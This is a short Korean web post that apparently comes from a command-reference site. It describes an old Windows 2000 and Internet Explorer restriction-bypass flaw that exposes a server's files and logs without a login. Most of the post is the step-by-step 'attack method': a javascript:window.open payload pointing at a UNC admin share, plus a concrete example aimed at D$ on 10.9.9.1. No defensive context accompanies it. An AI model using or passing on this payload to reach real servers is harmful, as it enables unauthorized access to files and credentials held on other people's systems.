사이트 내 전체검색
브라우저(IE)로 윈도2k서버 내용물 들여다 보기
로빈아빠
https://cmd.kr/server/897 URL이 복사되었습니다.

본문

윈도2k+IE(Full Patch)에서 Restriction Bypass 공격 :

- 취약점 개요
http://와 같은 방법으로 브라우저상에서 파일을 보기 위한 방법으로 ftp://나 file://, news://와 같은 입력방법이 사용된다.
그러나 인증으로 제한이 가해진 서버에서는 이같은 방법으로 아이디나 비밀번호가 없이ftp:는 서버안의 내용을 볼 수가 없다.

그런데 이것을 우회해서 통과하는 방법이 있어서 보안상의 문제점으로 대두된다.
이 방식을 사용하면 해당 서버내의 로그파일이나 파일을 다운로드 받을 수 있게된다.


- 공격방법
1. 브라우저(IE)를 열고 다음과 같이 입력한다.
javascript:window.open('\\\\\\\\\\\\\\\\\\\\{computer name,or IP, or URL}\\\\{resource, for example D$}')

2. 구체적인 예제는 다음과 같다.
javascript:window.open('\\\\\\\\\\\\\\\\\\\\10.9.9.1\\\\D$')

댓글목록

등록된 댓글이 없습니다.

1,139 (17/23P)

Search

Copyright © Cmd 명령어 18.222.56.251